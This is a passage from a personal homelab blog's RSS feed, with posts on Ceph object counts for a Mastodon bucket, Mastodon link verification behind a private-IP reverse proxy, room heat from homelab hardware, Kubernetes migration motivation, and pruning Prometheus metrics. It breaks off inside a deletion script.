<p>Finally, here is a graph of the stored data in the Ceph pool which houses the
Mastodon S3 bucket:</p>
<figure>
    <img loading="lazy" src="stored-data-bulk.png"
         alt="The last Grafana time series screenshot for today. I promise. This one shows the Stored User Data Per Pool, specifically for my &#39;bulk&#39; pool. This pool houses the Mastodon S3 bucket. The graph shows the same time interval as the previous one. A comparison shows that the Mastodon S3 bucket contains a lot of objects, but not that much data. The drops in stored data occur at the same time as the drops in the total number of objects, but it is clear that the drops in the total object counts are bigger than the drop in used storage. Overall, the plot starts out at 1.94 TiB and, through a number of rises and drops ends at 1.95 TiB. The drops are almost all smaller than 0.01 TiB. The Y axis goes from 1.94 TiB to 1.96 TiB, illustrating how relatively small the change in overall used storage is over roughly a month."/> <figcaption>
            <p>This plot shows the amount of storage used in my HDD backed bulk storage pool, which backs Mastodon&rsquo;s S3 bucket.</p>
        </figcaption>
</figure>

<p>The main thing to note on this plot is the relatively small change. Note that the
Y axis only goes from 1.94 TiB to 1.96 TiB. Even the largest drop is below 10 GiB.
Compare, for example, the first larger drop, late on October 26th, on both plots.
In the object count plot, this is a reduction of 20k objects. But those objects
account for less than 10 GiB on the used storage plot.</p>
<h2 id="conclusion">Conclusion</h2>
<p>Quite honestly, even though I was not able to get to the bottom of the issue,
I still enjoyed the process. It was a really nice Homelabbing task.
I especially enjoyed the trip into the Ceph RGW C++ source code. It doesn&rsquo;t
happen often that I get to use my C++ proficiency in the Homelab. Most things
are implemented in Go or web languages.</p>
<p>So how to go forward with this? I&rsquo;m not quite sure. It&rsquo;s &ldquo;good enough&rdquo; for now,
and at least I&rsquo;ve learned to keep an eye on it. I&rsquo;ve also slightly increased the priority
of the task to set up monitoring of the S3 buckets and their sizes.
The overall object count was a pretty good proxy here, but I&rsquo;d like to have
the history for specific buckets.</p>
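<p>In the meantime, a quick way to eyeball a single bucket&rsquo;s object count and size is the
RGW admin tool, here sketched with the <code>mastodon</code> bucket from the logs above:</p>
<pre tabindex="0"><code>radosgw-admin bucket stats --bucket=mastodon
</code></pre>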
<p>I also want to return here at some point, to really look into Ceph&rsquo;s RGW, with
the goal of setting up a VM test cluster and trying to reproduce the issue with
a minimal example. Because right now I don&rsquo;t have anything I could put into a
bug report against Ceph (as noted in the beginning, I&rsquo;m pretty sure this is an
issue in Ceph, not Mastodon) besides lots of hand waving. And &ldquo;there&rsquo;s something
wrong with the RGW&rsquo;s handling of the DeleteObjects API&rdquo; just isn&rsquo;t a useful
bug report.</p>
<p>I&rsquo;m also still considering submitting a feature request to Mastodon, to
perhaps introduce an env variable that switches the Vacuum job from using
the DeleteObjects S3 API to using single DELETE requests, similar to what <code>tootctl</code> does.
But then again, this doesn&rsquo;t look like a Mastodon issue to me, and the team
really already has enough things on its plate.</p>
]]></content:encoded>
    </item>
    <item>
      <title>How to configure Mastodon link verification</title>
      <link>https://blog.mei-home.net/posts/mastodon-link-verification/</link>
      <pubDate>Thu, 14 Nov 2024 22:03:05 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/mastodon-link-verification/</guid>
      <description>You need to be aware of private IP blocking</description>
      <content:encoded><![CDATA[<p>To distract myself from the fact that the last commit in the repo for my
<a href="/posts/k8s-migration-12-backup-issues/#over-engineered-but-hopefully-fun">k8s Backup Operator</a>
was about one month ago, I decided to tackle a random assortment of tasks.
One of them was to finally set up <a href="https://joinmastodon.org/verification">link verification</a>
for my Blog on Mastodon.
It looks like this when it&rsquo;s working:</p>
<figure>
    <img loading="lazy" src="profile.png"
         alt="A screenshot of my Mastodon profile page. In the link section, it has the URL of this blog, with a green background and a green check mark in front of it."/> <figcaption>
            <p>My Mastodon profile with the link to this blog properly verified, as indicated by the green check mark.</p>
        </figcaption>
</figure>

<p>I went through some issues in <a href="https://gohugo.io/">Hugo</a>, the blogging software
I&rsquo;m using, and <a href="https://github.com/adityatelange/hugo-PaperMod">PaperMod</a>, my
blog&rsquo;s theme and finally came across <a href="https://github.com/adityatelange/hugo-PaperMod/discussions/896">this discussion</a>
on the theme&rsquo;s GitHub page.
It proposes to add the required link back to my Mastodon profile in the footer.</p>
<p>The advice to copy+paste the entire content of the theme&rsquo;s <code>footer.html</code> and
then put it into Hugo&rsquo;s override folder seemed a bit too heavy-handed once
I saw this line in the <code>footer.html</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span>{{- partial &#34;extend_footer.html&#34; . }}
</span></span></code></pre></div><p>Looking further at <code>extend_footer.html</code>, I found this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span>{{- /* Footer custom content area start */ -}}
</span></span><span style="display:flex;"><span>{{- /*     Insert any custom code web-analytics, resources, etc. here */ -}}
</span></span><span style="display:flex;"><span>{{- /* Footer custom content area end */ -}}
</span></span></code></pre></div><p>Feeling adventurous, I added the following content at <code>layouts/partials/extend_footer.html</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span>&lt;<span style="color:#f92672">footer</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;footer&#34;</span>&gt;
</span></span><span style="display:flex;"><span>    &lt;<span style="color:#f92672">span</span>&gt;
</span></span><span style="display:flex;"><span>        &lt;<span style="color:#f92672">a</span> <span style="color:#a6e22e">rel</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;me&#34;</span> <span style="color:#a6e22e">href</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;https://social.mei-home.net/@mmeier&#34;</span>&gt;Mastodon Verification Link&lt;/<span style="color:#f92672">a</span>&gt;
</span></span><span style="display:flex;"><span>    &lt;/<span style="color:#f92672">span</span>&gt;
</span></span><span style="display:flex;"><span>&lt;/<span style="color:#f92672">footer</span>&gt;
</span></span></code></pre></div><p>This path is relative to my blog&rsquo;s top-level directory, not to the
corresponding directory inside the theme.
You can see the result of this addition at the very bottom of this post.</p>
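<p>As a quick sanity check that the link actually makes it into the rendered page, grepping
the homepage for the <code>rel=&#34;me&#34;</code> attribute is enough:</p>
<pre tabindex="0"><code>curl -s https://blog.mei-home.net/ | grep -o &#39;&lt;a rel=&#34;me&#34;[^&gt;]*&gt;&#39;
</code></pre>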
<p>The correct HTML to be added is provided right inside Mastodon. Have a look at
&ldquo;Preferences&rdquo; -&gt; &ldquo;Public profile&rdquo; -&gt; &ldquo;Verification&rdquo;:</p>
<figure>
    <img loading="lazy" src="verification-page.png"
         alt="A screenshot of Mastodon&#39;s preferences page. The &#39;Public profile&#39; menu option is chosen in the main menu, and the tab &#39;Verification&#39; is chosen in the top menu. The page reads like this: Website Verification Verifying your identity on Mastodon is for everyone. Based on open web standards, now and forever free. All you need is a personal website that people recognize you by. When you link to this website from your profile, we will check that the website links back to your profile and show a visual indicator on it. Here is how: Copy and past the code below into the HTML of your website. Then add the address of your website into one of the extra fields on your profile from the &#39;Edit profile&#39; tab and save changes. The HTML code shown reads &lt;a rel=&#39;me&#39; href=&#39;https://social.mei-home.net/@mmeier&#39;&gt;Mastodon&lt;/a&gt;"/> <figcaption>
            <p>Mastodon&rsquo;s link verification page.</p>
        </figcaption>
</figure>

<p>In the end I&rsquo;m not sure I really need this extra link. The PaperMod theme already
includes &lsquo;me&rsquo; in the &lsquo;rel&rsquo; attribute of the link to my Mastodon profile anyway.
But I haven&rsquo;t gotten around to testing whether that&rsquo;s enough yet.</p>
<p>But even after adding this link to my blog successfully, I still wasn&rsquo;t seeing
link verification. Which was when I asked for help from the Fediverse. The first
useful reply was <a href="https://chaos.social/@HeNeArXn/113461123679972454">this one</a>,
which told me that my blog was indeed showing up as verified on other instances.
This was rather helpful, as it indicated that the problem was with my Mastodon
instance instead of with the blog&rsquo;s config.</p>
<p>I then proceeded to have a look at my blog&rsquo;s access logs. Luckily, Mastodon
always sends along the name of the instance in the User Agent header. And I
couldn&rsquo;t find my own instance anywhere in there.
At the same time, I also tried to <code>curl</code> the blog from inside the Mastodon
sidekiq container. I did not have any issues, and received my blog&rsquo;s homepage
as expected.</p>
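<p>For anyone wanting to do the same check: Mastodon&rsquo;s fetch shows up in the access logs
with the instance&rsquo;s hostname in the User Agent, so something along these lines should find
it. The log path is just an assumption here, adjust it for your reverse proxy:</p>
<pre tabindex="0"><code>grep -i &#39;mastodon&#39; /var/log/nginx/access.log | grep &#39;social.mei-home.net&#39;
</code></pre>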
<p>The solution finally came in <a href="https://chaos.social/@HeNeArXn/113461259794934516">this post</a>.
It noted that by default, Mastodon does not send HTTP requests (like the one
necessary to fetch the blog&rsquo;s homepage) to the private IP range.</p>
<p>Internally, I&rsquo;m hosting both my blog and Mastodon in my Homelab. I&rsquo;ve also got
all of my domains pointing to an internal reverse proxy in my DNS. So the Mastodon request
fetching my blog for link verification would get back an IP in the private range
when resolving <code>blog.mei-home.net</code>, and would then not access the page at all.</p>
<p>Luckily, Mastodon has an environment variable to configure that behavior and
allowlist an IP in the private range, <a href="https://docs.joinmastodon.org/admin/config/#allowed_private_addresses">see here</a>.
So the only thing I needed to do was add the following to my Mastodon config:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>ALLOWED_PRIVATE_ADDRESSES <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;10.0.0.12&#34;</span>
</span></span></code></pre></div><p>Where <code>10.0.0.12</code> is the IP of the internal host which runs the internal
reverse proxy to which <code>blog.mei-home.net</code> resolves.</p>
<p>And with that, the link to my blog is finally verified.</p>
<p>Finally, a big thanks to Fediverse user <a href="https://chaos.social/@HeNeArXn">@HeNeArXn</a>,
who helped me solve this particular mystery.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Homelab Heating?</title>
      <link>https://blog.mei-home.net/posts/homelab-heat/</link>
      <pubDate>Wed, 21 Aug 2024 00:40:09 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/homelab-heat/</guid>
      <description>It&amp;#39;s getting hot in here.</description>
      <content:encoded><![CDATA[<p>I&rsquo;ve been sitting on this topic since last summer, which was the first one
during which I&rsquo;ve had temperature measurements and history available for my
living room. Said living room is also where my Homelab lives, right next to my
desk. I&rsquo;ve never really minded that, but the fact that it sits right next to me most of
the time was one factor in deciding to go with low-power Raspberry Pis instead
of a couple of enterprise-grade servers. But now I think I&rsquo;ve discovered a real
problem: Heat.</p>
<p>We&rsquo;ve had a couple of mild days after the recent heat wave in Germany. And
somehow I wasn&rsquo;t able to cool down my living room properly. The temps go down
while I have my balcony door open, but they also go up rapidly again once I
close it.</p>
<p>Here is the main figure I want to talk about:
<figure>
    <img loading="lazy" src="temps.png"
         alt="Sorry to the screenreader users. The detailed behavior of the curves is actually important for this blog post, and I know it got a bit wordy. I hope it is still somewhat clear what&#39;s going on in the graph. A screenshot of a Grafana time series. On the Y axis, it shows the dates from August 18th 00:00 to August 20th 20:00. It shows two temperature curves. The consistently higher one, shown in orange, is referenced in further text as the indoor/living room temperature. The consistently lower one shows the outdoor temperature. The outdoor temperature starts out at 22.5° C. It stays above 20° C until 18:00 on the 18th. Then it starts falling towards the lowest point at 15.2° at 06:00 on the 19th. It rises a bit throughout that day, but its maximum on the 19th is 18.3° C. It only rises above 20° C in a sudden spike on the next day, August 20th, shortly past 18:00 before falling back to 19°. The second curve, the indoor temperature, starts at 27.9° C. Around 01:00 on the 18th, it starts falling slowly to 26.9° at 08:40. Starting there, it falls more steeply, towards 25°. At around 15:00 it starts rising back to a max of 27°. Then it falls rapidly again to 25° at 20:30. Then it rises back to a max of 27° at 01:00, where the slow fall happens again until 08:40, where the more rapid fall happens again. Shortly thereafter it rises again rapidly, just to fall rapidly again. At 12:15 on the 19th, it rises again, first steeply, then more gradually, to a max of 26.5° at 01:00. Then the slow fall happens again until 08:40 on the 20th, finally followed by another steep rise plus slower rise as before. But the slower rise now peters out at about 26° C around 21:00 on the 20th."/> <figcaption>
            <p>Temperature measurements from August the 18th 00:00 to August 20th 22:00. The orange upper curve is the indoor temperature for my living room with the Homelab and my desktop machine in it, and the red, lower curve is the outside temperature measured on my balcony.</p>
        </figcaption>
</figure>
</p>
<p>The above temperature measurements were made in my living room, on a wall that is near neither my Homelab nor my desktop machine.
The outside measurement was made on my balcony, from under a table. The large spike in the outdoor temperature can be ignored; that&rsquo;s an artifact of the sensor&rsquo;s placement,
probably the sun hitting it for a while.
The measurements are made with the same type of sensor, but those sensors are
not anything fancy. In this post, I&rsquo;d like to discuss the temperature behavior,
so the correctness of the absolute values is not too important, as long as the
sensors are off by a consistent amount, which I believe they are.</p>
<p>As I&rsquo;ve noted above, these measurements were taken between the 18th and 20th
of August, which were relatively cloudy days with relatively low temperatures
for mid-August. These three days were a welcome respite from the heat, and I
wanted to use them to get the heat out of my apartment. Note that I don&rsquo;t have
A/C in here, so any cooling has to come from cool air being let inside the
place. This generally happens in two ways in my living room:</p>
<ol>
<li>During the night, before going to sleep, I half-open my balcony door. I&rsquo;m not
sure whether that&rsquo;s even a thing in other countries? Anyway, it basically means that instead of opening the door to either side, I tilt it just a bit towards
the inside.</li>
<li>Once I get up, I generally open the door fully.</li>
</ol>
<p>Before going into the graph, let&rsquo;s describe the &ldquo;me&rdquo; factor in the measurements.
I started a one-week leave on Monday, so I was home most of the day during
Sunday and Monday, the 18th and 19th. On the 20th, I started a trip to visit
family around 12:00 and haven&rsquo;t been back since then.</p>
<p>When it comes to computers in that room, it holds both my Homelab and my desktop
machine, plus two 22&quot; screens. The Homelab, meaning 13 Raspberry Pi 4s, five
low- to mid-power x86 machines and a passively cooled 16 port switch, eats about
200 - 220 Watts constantly.
My desktop uses about 100W - 120W during normal web surfing/Youtube/Dev usage
and about 230W when gaming. Plus another 30 or so Watts for the two monitors.
I switch the desktop on in the morning and switch it off before going to bed.</p>
<p>Then there&rsquo;s also the human factor in this, because I was in the same room most
of the time, minus the nights, but I will ignore that for the sake of this
discussion.</p>
<p>So the base load of the room is a constant ~220W from the Homelab, plus another
150W - 260W from my desktop setup during waking hours.</p>
<p>Now onto a bit of behavioral description when it comes to ventilation. I went to
bed every night around 01:00, at which time I tilt my living room balcony door
and open my bathroom door and tilt its window as well for some through-ventilation.
These account for the relatively slow nighttime drops of the temps throughout the
graph. Then when getting up around 08:40, I open the balcony door fully. This
event can also be seen very clearly in the graph as a sharp temp drop.</p>
<p>And here we come to the point of this whole post: Once I close the balcony door,
the temp immediately rises sharply and reaches almost to the previous max again.
And just for those who are wondering: Yes, I&rsquo;ve checked multiple times whether
I accidentally put on the heating.</p>
<p>Note also the difference in the climb from 12:00 on the 19th and 12:00 on the
20th. On the 19th, it climbs quite high, to 26.5° C or so, while on the 20th
it peters out around 26° already.</p>
<p>The explanation seems pretty obvious, of course - at the peak, I&rsquo;m dumping about
480 Watts worth of heat into that room, plus whatever my body produces.
I&rsquo;m just a bit surprised at how rapidly the temps rise after closing the balcony
door.</p>
<p>I would have really loved to put some math into this, but my google-fu is utterly
deserting me. I&rsquo;ve gone up to page eight now and not found anything better than
&ldquo;yes, every Watt of electricity consumed is turned into heat&rdquo;.</p>
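<p>Just to put a rough, back-of-the-envelope number on this (all assumptions mine): if the
room holds something like 50 m³ of air, and air&rsquo;s volumetric heat capacity is roughly
1.2 kJ/(m³·K), then the air alone stores about 60 kJ per degree. 480 Watts is 480 Joules
per second, so if none of the heat escaped and only the air warmed up, that would be a rise
of roughly 0.5° C per minute. Walls, furniture and losses through the windows obviously soak
up most of it, but it does make the sharp rise right after closing the door a lot less
surprising.</p>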
<p>This is another reason to get a move on with the Kubernetes migration, as
finishing that would allow me to get the Homelab back to around 150W.</p>
<p>In conclusion: I should really be looking for an apartment with a well-ventilated
separate room for the Homelab and switch my desktop to rack-mounted while I&rsquo;m
at it.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 13: Almost one year</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-13-almost-one-year/</link>
      <pubDate>Thu, 15 Aug 2024 00:10:02 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-13-almost-one-year/</guid>
      <description>Motivation hole</description>
      <content:encoded><![CDATA[<p>Wherein I realize that I&rsquo;ve been at this for almost a year now.</p>
<p>This is part 14 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>It has been quite a while since I last wrote a blog post about the migration.
And I&rsquo;ve realized today that it&rsquo;s been almost a year since I made the decision
to switch over to Kubernetes for my Homelab.
On the 17th of August 2023, I posted about <a href="https://blog.mei-home.net/posts/hashipocalypse/">the HashiPocalypse</a>.</p>
<p>Back then, I laid out my thoughts about HashiCorp&rsquo;s decision to switch all of
their tools, almost all of which I&rsquo;m currently using in my Homelab, to the
BSL license.
Back then, I only announced it as an experiment, but it has become a migration
at this point.</p>
<p>I really started the migration in mid-December 2023, so it hasn&rsquo;t really been
almost a year. The first months went pretty well and I got a lot of the initial
setup and infrastructure into place. At the end of April, I was finally done
with all of the infrastructure, from Ceph Rook for storage to kube-prometheus-stack
for metrics. On the 28th of April, I migrated the first piece of what I&rsquo;d call
&ldquo;real workload&rdquo; over, my <a href="https://www.audiobookshelf.org/">Audiobookshelf</a> server.
This then served me as a test bed, first of all for my workload template, but
also for my backups, which came next.</p>
<p>And that&rsquo;s where the problems started, when I finally realized that k8s doesn&rsquo;t
have a combination of <a href="https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/">CronJobs</a>
and <a href="https://kubernetes.io/docs/concepts/workloads/controllers/daemonset/">DaemonSets</a>.
That&rsquo;s a problem because my current backup setup, on my Nomad cluster, uses such
a type of job to run my backups on every node.</p>
<p>But fear not, I thought: I know Python, I know how to access an API, we&rsquo;re just
going to write our own operator for backups!</p>
<p>And that was a mistake, in hindsight. Don&rsquo;t get me wrong, I will still continue
working on the operator, but starting to write it was a mistake. Because I know
how programming projects generally go when I&rsquo;m working on them alone.
My intro of Nomad to my Homelab was delayed by about half a year because I
decided I don&rsquo;t like the Nomad CLI and wanted something more like docker-compose.
So I got out the Python and wrote it. And it took ages.</p>
<p>The same thing has happened here. It&rsquo;s not really a complicated implementation.
But it&rsquo;s about my backups, so I want to do it properly. Yet the project is getting
dragged out, and I&rsquo;m not sure why. The motivation isn&rsquo;t the same as it was while
doing all of the infra setups at the beginning of the year. These days I average about one
commit per week, if that much.</p>
<p>The problem is: I really need to get going with the migration. Maintaining what
amounts to two different Homelabs, both hosting important things, is getting a
bit too much.
I mean, will I give up on the plan to implement my backup operator? No, of course
not. Sunk cost fallacy and all that.
But I definitely wish I hadn&rsquo;t started. I would be way farther ahead. I just
need to find where the heck my motivation has gotten to. Perhaps it&rsquo;s just the
summer? My motivation has generally been pretty low when the simple act of typing
a bit more vigorously would already make me break out in a sweat. I really
strongly dislike summer, and I&rsquo;m very much ready for this year&rsquo;s to be over
and done with.</p>
<p>And it has a little bit to do with the ridiculousness of how I write software.
First of all, the first couple of weeks are spent writing very copious amounts
of notes. Making diagrams. Spending way more time on project/tooling setup than
is at all reasonable. And then the tests. The ratio of UT code to production code
is ridiculous. I couldn&rsquo;t write a prototype or MVP if my life depended on it.</p>
<p>So if any one of you meets my motivation, please send it back to me! It will be
the middle-aged guy who looks like his beard really shouldn&rsquo;t be gray yet. You
will recognize it by the large amount of grumbling going on.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Prometheus Metrics Cleanup</title>
      <link>https://blog.mei-home.net/posts/prometheus-metrics-cleanup/</link>
      <pubDate>Fri, 28 Jun 2024 21:58:20 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/prometheus-metrics-cleanup/</guid>
      <description>Dropping metrics during scraping and deleting series from the DB</description>
      <content:encoded><![CDATA[<p>I had to clean up my Prometheus data, and it got pretty darned close there.</p>
<p>When it comes to my metrics, I&rsquo;m very much a data hoarder. Metrics gathering
was what got me into Homelabbing as a hobby, instead of just a means to an end.
Telegraf/Influx/Grafana were the first new services on my Homeserver in about
five years. And I really do like looking at my dashboards, including looking at
past data. My retention period currently is five years. And I&rsquo;m already pretty
sure that when I come up to those five years for the initial data, I will just
extend that to 10 years. &#x1f605;</p>
<p>But back in the beginning of June, I hit the 98.5% utilization for the Ceph RBD
which was housing my <a href="https://prometheus.io/">Prometheus</a> TSDB. The volume has
100 GB of available space. And it was full. I migrated Prometheus to my new
k8s cluster <a href="https://blog.mei-home.net/posts/k8s-migration-9-prometheus/">back in March</a>.
In the same setup, I also deployed <a href="https://github.com/prometheus-community/helm-charts/tree/main/charts/kube-prometheus-stack">kube-prometheus-stack</a>,
to gather the data from my k8s cluster. At the same time, I&rsquo;m still gathering
data from my Nomad/Consul cluster. I&rsquo;m also gathering data from two Ceph clusters.
One being my old baremetal cluster, and one being my new Ceph Rook cluster.
Since the k8s migration started, I&rsquo;m also gathering data for eight additional
hosts. Plus the data from the k8s cluster itself. That additional data has had
quite some impact. Here is the growth of the utilization of the volume storing
the Prometheus TSDB:</p>
<figure>
    <img loading="lazy" src="utilization.png"
         alt="A Grafana time series plot. It shows time, starting from 3rd of March through to June 26th on the x axis, and volume utilization in percent on the y axis. The curve starts at around 50% in the beginning of March and very consistently rises up to about 100% by June eighth. On June eighth, there is a strong drop to 72%, then some jitter and a final drop to 69% around June tenth. After that, the curve steadily grows again, although at a lower rate than before."/> <figcaption>
            <p>Storage volume utilization of the TSDB</p>
        </figcaption>
</figure>

<p>The initial 50%/50GB was the data I had gathered since around February 2021,
which was when I initially switched from Influx to Prometheus. The next 50% then
came in less than three months. It was clear that I had to slow down the rate
of growth.</p>
<p>And so I embarked on a project to drop uninteresting metrics from scraping and
to delete the data those metrics had already accumulated in Prometheus.
My main guidance for this action was <a href="https://tanmay-bhat.github.io/posts/how-to-drop-and-delete-metrics-in-prometheus/">this blog post</a>.</p>
<h2 id="figuring-out-what-to-keep-and-what-to-drop">Figuring out what to keep and what to drop</h2>
<p>The first step was to take inventory. Tanmay describes a method to find
the most costly metrics in their post, but I wasn&rsquo;t really after costly metrics,
just ones I knew I was not interested in now and probably never would be in
the future. This took some thinking, because what if I suddenly realized
a metric was super interesting but didn&rsquo;t have five years&rsquo; worth of data on it?!</p>
<p>The horror! &#x1f631;</p>
<p>But before I could start, I had to port-forward the Prometheus port to my
local machine, because Prometheus is not directly accessible outside the cluster:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl port-forward -n monitoring prometheus-monitoring-kube-prometheus-prometheus-0 28015:9090
</span></span></code></pre></div><p>First step, getting all the metric series currently in the TSDB:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>curl http://localhost:28015/api/v1/label/__name__/values | tr <span style="color:#e6db74">&#39;,&#39;</span> <span style="color:#e6db74">&#39;\n&#39;</span> | tr -d <span style="color:#e6db74">&#39;&#34;&#39;</span> &gt; all.txt
</span></span></code></pre></div><p>This produces a list with all of the series names, like this:</p>
<pre tabindex="0"><code>apiserver_client_certificate_expiration_seconds_bucket
apiserver_client_certificate_expiration_seconds_count
apiserver_client_certificate_expiration_seconds_sum
apiserver_current_inflight_requests
apiserver_current_inqueue_requests
</code></pre><p>This resulted in a grand total of 3455 metrics. And remember, those are entire
metrics - not unique permutations of labels!</p>
<p>Because I didn&rsquo;t have any good way to make a decision just from the series name,
I went through each and every one of them and plonked them into Grafana&rsquo;s
explore tab and looked at them.</p>
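<p>As a complementary approach, in case someone is hunting for the most expensive metrics
rather than just the most boring ones: Prometheus has a TSDB status endpoint that lists
the metrics with the highest series counts, roughly like this:</p>
<pre tabindex="0"><code>curl -s http://localhost:28015/api/v1/status/tsdb | jq &#39;.data.seriesCountByMetricName&#39;
</code></pre>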
<p>In the end, I had 1279 metrics I wanted to keep, and 3176 I wanted to drop.
But before I went and deleted the series from Prometheus, I had to stop
Prometheus from scraping them. The overwhelming majority of metrics I wanted to
drop came from my Ceph clusters and the k8s cluster itself.</p>
<p>To drop a metric, you can use Prometheus&rsquo; <a href="https://prometheus.io/docs/prometheus/latest/configuration/configuration/#metric_relabel_configs">metric relabeling</a>
with the <code>drop</code> action. Let&rsquo;s say you want to drop all VolumeAttachment
metrics, you could add the following list item to the <code>metricRelabelings</code> of the
corresponding <a href="https://github.com/prometheus-operator/prometheus-operator/blob/main/Documentation/api.md#monitoring.coreos.com/v1.ServiceMonitor">ServiceMonitor</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">regex</span>: <span style="color:#e6db74">&#39;kube_volumeattachment_.*&#39;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">sourceLabels</span>: [<span style="color:#ae81ff">__name__]</span>
</span></span></code></pre></div><p>It&rsquo;s important to note that this does not stop Prometheus from scraping the
metric. The metric just isn&rsquo;t written to the database, and is instead dropped.</p>
<p>I could comfortably add all the k8s metrics I wanted to drop into the <code>values.yaml</code>
for the kube-prometheus-stack Helm chart. The only thing to look out for is that
there are ServiceMonitors for each individual k8s component, e.g. kube-scheduler,
apiserver and etcd all have their own. To figure out into which ServiceMonitor
a specific metric drop belongs, it helps to look at the <code>job</code> label, which
contains the k8s component which produced the metric.
But watch out! Some metrics are actually produced by more than one component, so
check all the label values, not just the most recently scraped one.
Also look out for the names of the metrics. For example, just because a metric
starts with <code>apiserver_</code> doesn&rsquo;t necessarily mean that it is produced by the
apiserver and hence should be dropped there.</p>
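<p>To check the <code>job</code> label values without clicking through Grafana, a quick query
against the API works as well; <code>apiserver_request_total</code> is just an example metric here:</p>
<pre tabindex="0"><code>curl -s &#39;http://localhost:28015/api/v1/query&#39; \
  --data-urlencode &#39;query=count by (job) (apiserver_request_total)&#39; \
  | jq &#39;.data.result[].metric.job&#39;
</code></pre>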
<p>As I mentioned above, Ceph was the other big source of drop-able metrics. But
here, I hit a severe disappointment: As nice as Rook is, it doesn&rsquo;t currently
support configuring the ServiceMonitors it creates, at all. So while I could
drop the unwanted metrics for my baremetal cluster, the same metrics are
still gathered for the Ceph Rook cluster. I will have to look into that in the
near future.</p>
<p>Overall, this was a pretty time-consuming procedure, but at the end
I was pretty happy with the number of metrics I was able to drop.</p>
<p>I&rsquo;ve just done another very &ldquo;rough and ready&rdquo; check, and it seems that my
dropping of metrics did not actually slow the growth down that much. Before
I started dropping all those metrics, the disk usage was growing at about 600 MB
per 24h. Now it&rsquo;s at approximately 500 MB per 24h. Not really that much gain,
to be honest.</p>
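<p>One way to do such a &ldquo;rough and ready&rdquo; check is a <code>delta()</code> over the volume
usage metric, something like the following. The PVC name regex is an assumption and needs
adjusting to whatever the operator actually created:</p>
<pre tabindex="0"><code>curl -s &#39;http://localhost:28015/api/v1/query&#39; \
  --data-urlencode &#39;query=delta(kubelet_volume_stats_used_bytes{persistentvolumeclaim=~&#34;.*prometheus.*&#34;}[24h])&#39; \
  | jq &#39;.data.result[].value[1]&#39;
</code></pre>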
<h2 id="deleting-unwanted-metrics">Deleting unwanted metrics</h2>
<p>Deleting unwanted data in Prometheus is a two-step process. First, the unwanted
series need to be marked for deletion with the <a href="https://prometheus.io/docs/prometheus/latest/querying/api/#delete-series">Prometheus API</a>.
Once that&rsquo;s done, the metrics need to actually be deleted, again with the
<a href="https://prometheus.io/docs/prometheus/latest/querying/api/#clean-tombstones">Prometheus API</a>.</p>
<p>Because I already had the metrics to be deleted nicely listed in a file with
one metric name per line, I wrote a quick bash script to automate the deletion:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span><span style="color:#75715e">#! /bin/bash
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>PROMETHEUS_SERVER<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;http://localhost:28015&#34;</span>
</span></span><span style="display:flex;"><span>metrics_list<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>1<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">while</span> read metric; <span style="color:#66d9ef">do</span>
</span></span><span style="display:flex;"><span>  echo <span style="color:#e6db74">&#34;</span>$metric<span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>  curl -X POST -g <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PROMETHEUS_SERVER<span style="color:#e6db74">}</span><span style="color:#e6db74">/api/v1/admin/tsdb/delete_series?match[]=</span><span style="color:#e6db74">${</span>metric<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">done</span> &lt;$metrics_list
